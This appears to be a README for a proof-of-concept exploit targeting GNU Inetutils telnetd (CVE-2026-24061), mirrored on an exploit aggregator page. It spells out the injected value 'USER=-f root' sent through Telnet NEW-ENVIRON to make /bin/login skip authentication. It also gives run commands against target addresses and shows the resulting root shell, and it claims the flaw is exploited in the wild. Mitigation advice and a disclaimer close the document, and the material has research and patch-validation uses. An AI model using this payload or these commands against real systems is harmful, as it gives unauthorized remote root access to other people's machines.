Share
## https://sploitus.com/exploit?id=A7C4159E-E3CD-5EBB-972E-25FCDE265C18








---
## 🧨 Overview
This repository contains a Proof‑of‑Concept exploit for **GNU Inetutils telnetd** remote authentication bypass vulnerability.
The issue arises because telnetd improperly sanitizes the **USER** environment variable received via Telnet **NEW‑ENVIRON** negotiation before invoking `/bin/login`.
By supplying:
```
USER=-f root
```
telnetd effectively executes:
```
/bin/login -f root
```
which bypasses authentication and spawns an immediate **root shell**.
* **Product:** GNU Inetutils telnetd
* **Affected Versions:** ≤ 2.7
* **Port:** 23/TCP
* **Auth:** Not required
* **Impact:** Authentication Bypass → Root Shell
* **Privileges:** root
* **CVE:** CVE‑2026‑24061
* **CVSS:** 9.8 (Critical)
---
## ⚙️ Technical Details
Telnet NEW‑ENVIRON allows clients to set environment variables during session negotiation.
Vulnerable telnetd passes USER directly to login:
```
/bin/login -f "$USER"
```
An attacker sets:
```
USER=-f root
```
Result:
```
/bin/login -f root
```
The `-f` flag tells login to **skip authentication**, granting root access.
---
## 📦 Requirements
* Python 3
* telnetlib (standard library)
* Target running vulnerable inetutils‑telnetd ≤ 2.7
* Telnet service reachable on TCP/23
No external dependencies required.
---
## 🚀 Usage
### 1️⃣ Run Exploit
```bash
python3 cve-2026-24061.py 192.168.1.100
```
---
### 2️⃣ Optional Port
```bash
python3 cve-2026-24061.py example.com 23
```
---
### 3️⃣ Expected Result
If vulnerable:
```
# id
uid=0(root) gid=0(root)
#
```
You now have an interactive root shell.
---
## 🧪 Example
```bash
python3 cve-2026-24061.py 10.10.10.20
```
Output:
```
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
```
---
## 🧯 Notes
* Exploit is **instant**
* No brute force required
* No credentials required
* Observed exploited in the wild
* Works on default Debian/Ubuntu inetutils‑telnetd installs
* Fails if telnetd patched or replaced (e.g., OpenBSD telnetd)
---
## 🛡️ Mitigation
* Upgrade GNU Inetutils ≥ 2.8
* Disable telnet service
* Replace with SSH
* Block TCP/23 at firewall
* Audit inetutils‑telnetd packages
---
## 📊 PoC Attack Flow
```mermaid
sequenceDiagram
participant A as Attacker
participant T as Target telnetd
participant L as /bin/login
participant R as Root Shell
A->>T: Connect TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Execute /bin/login -f root
L-->>T: Auth bypass success
T-->>R: Spawn root shell
R-->>A: Interactive root session
```
---
## ⚠️ Disclaimer
This exploit is provided for:
* Security research
* Authorized penetration testing
* Defensive validation
Unauthorized use against systems you do not own or have permission to test is illegal.